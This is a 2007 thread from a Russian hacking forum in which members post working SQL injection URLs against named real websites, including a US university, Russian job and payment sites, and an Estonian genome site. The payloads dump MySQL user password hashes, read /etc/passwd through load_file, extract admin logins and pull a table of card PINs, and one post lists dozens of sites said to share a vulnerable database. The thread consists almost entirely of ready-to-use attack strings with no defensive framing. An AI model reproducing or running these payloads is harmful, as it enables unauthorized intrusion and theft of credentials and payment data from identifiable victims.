ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2681  
Старый 11.07.2007, 09:17
Аватар для a1ex
a1ex
Banned
Регистрация: 11.10.2006
Сообщений: 682
Провел на форуме:
3750406

Репутация: 271


Отправить сообщение для a1ex с помощью ICQ Отправить сообщение для a1ex с помощью AIM Отправить сообщение для a1ex с помощью MSN Отправить сообщение для a1ex с помощью Yahoo
По умолчанию

Код:
http://www.ofmusic.ru/mat/index.php?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12+from+information_schema.columns/*&mid=796
 
Ответить с цитированием

  #2682  
Старый 11.07.2007, 15:55
Аватар для ENFIX
ENFIX
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
Провел на форуме:
1628290

Репутация: 474
Отправить сообщение для ENFIX с помощью ICQ
По умолчанию

University of Arkansas Pine Bluff =)
Код:
http://www.uapb.edu/calendar.php?method=EventDetail&Eid=-39+union+select+1,user(),3,4,version(),6,7/*
Код:
http://www.uapb.edu/calendar.php?method=EventDetail&Eid=-39+union+select+1,concat(user,0x3a,password),3,4,5,6,7+from+mysql.user/*
Код:
http://www.uapb.edu/calendar.php?method=EventDetail&Eid=-39+union+select+1,2,3,4,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),6,7/*
Код:
http://www.uapb.edu/calendar.php?method=EventDetail&Eid=-39+union+select+1,2,3,4,load_file(char(47,101,116,99,47,104,111,115,116,115)),6,7/*
Код:
http://www.uapb.edu/calendar.php?method=EventDetail&Eid=-39+union+select+1,concat(AdminID,0x3a,AdminName,0x3a,AdminLoginName,0x3a,AdminPassword),3,4,5,6,7+from+admin/*
 
Ответить с цитированием

  #2683  
Старый 11.07.2007, 17:17
Аватар для Constantine
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

http://www.anycorp.com/log/log.php?id=-9+union+select+1,2,3,4/*
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #2684  
Старый 11.07.2007, 20:02
Аватар для 0nep@t0p
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию

http://zaki.ru/pagesnew.php?id=-1+union+select+1,2,3/*
2 I-I()/Ib
Sorry, лишний дописал

Последний раз редактировалось 0nep@t0p; 12.07.2007 в 05:45..
 
Ответить с цитированием

  #2685  
Старый 11.07.2007, 21:48
Аватар для Dr.Z3r0
Dr.Z3r0
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482

Репутация: 1796
По умолчанию

Цитата:
http://zaki.ru/pagesnew.php?id=-1+union+select+1,2,3,4/*
Шо за нах? Вообще то там три столбца.... То бишь вот так:
http://zaki.ru/pagesnew.php?id=-1+union+select+1,2,3/*
__________________
Кто я?..
 
Ответить с цитированием

  #2686  
Старый 12.07.2007, 02:30
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Цитата:
Сообщение от А. С. Грибоедова ("Горе от ума")  
А судьи кто?
Код:
http://www.vkks.ru/edit_ks.php?id=-1508%20union%20select%201,2,3,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),1),1),5,6,7,8,9,10,11%20from%20mysql.user/*
__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 12.07.2007 в 02:36..
 
Ответить с цитированием

  #2687  
Старый 12.07.2007, 09:17
Аватар для iRedX
iRedX
Участник форума
Регистрация: 18.06.2002
Сообщений: 126
Провел на форуме:
65642

Репутация: 46
Отправить сообщение для iRedX с помощью ICQ Отправить сообщение для iRedX с помощью MSN
По умолчанию

http://www.zonewm.biz/showasf.php?id=4+union+select+1,mail,3,pass,5,6,7, 8,9+from+user/*


http://www.webmarket.mobi/wm.php?id=3+union+select+1,2,table_name,4,5,6+from +information_schema.tables/*

http://www.webmarket.mobi/wm.php?id=3+union+select+1,p_user,pin_kod,4,ktype_ karta,6+from+karty_pin/*
 
Ответить с цитированием

  #2688  
Старый 12.07.2007, 14:13
Аватар для hitex
hitex
Новичок
Регистрация: 25.05.2007
Сообщений: 16
Провел на форуме:
80474

Репутация: 26
По умолчанию

Код:
http://www.rabota-chelyabinsk.info/agency.php?r=vac&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,concat_ws(0x203a20,email,pass),21,22,23,24,25,26,27,28,29+from+jobsmarket_spb.users
урлы = бд
PR от 1 до 5:

Код:
rabota-belgorod.info
rabota-bryansk.info
rabota-chelyabinsk.info
rabota-chita.info
rabota-ekaterenburg.info
rabota-ekaterinburg.info
rabota-irk.info	
rabota-izhevsk.info
rabota-kaluga.info
rabota-kazan.info
rabota-khabarovsk.info
rabota-kirov.info
rabota-kostroma.info
rabota-krasnodar.info
rabota-krasnoyarsk.info
rabota-kursk.info
rabota-lipetsk.info
rabota-murmansk.info
rabota-norilsk.info
rabota-nsb.info
rabota-nsk.info
rabota-omsk.info
rabota-orel.info
rabota-orenburg.info
rabota-penza.info
rabota-perm.info
rabota-pskov.info
rabota-rostov.info
rabota-ryazan.info
rabota-samara.info
rabota-saratov.info
rabota-smolensk.info
rabota-spb.info
rabota-stavropol.info
rabota-tambov.info
rabota-tomsk.info
rabota-tula.info
rabota-tver.info
rabota-tyumen.info
rabota-ufa.info
rabota-ulyanovsk.info
rabota-volgograd.info
rabota-voronezh.info
rabota-yaroslavl.info
rabota-yugra.info
 
Ответить с цитированием

  #2689  
Старый 12.07.2007, 16:19
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Код:
http://www.geenivaramu.ee/index.php?sub=-15%20union%20select%201,2,AES_DECRYPT(AES_ENCRYPT(concat(name,0x3a,pass),1),1),4,5%20from%20users%20limit%201,1/*
там basic авторизация, первый пароль не подошел
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

Ms-sql
  #2690  
Старый 12.07.2007, 17:04
Аватар для V.I.P
V.I.P
Познающий
Регистрация: 06.04.2007
Сообщений: 77
Провел на форуме:
1062869

Репутация: 136
Отправить сообщение для V.I.P с помощью ICQ
По умолчанию Ms-sql

Сайт: www.doorsopendays.com

inj: 1'+or+1=

Версия: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)

Имя БД: doorsopendays

Код:
http://www.doorsopendays.com/communities.asp?id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('comd_list','Buildings','Communities','dtproperties','Maps','sysconstraints','syssegments','cmd','D99_CMD','D99_REG','D99_Tmp','kill_kk'))--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ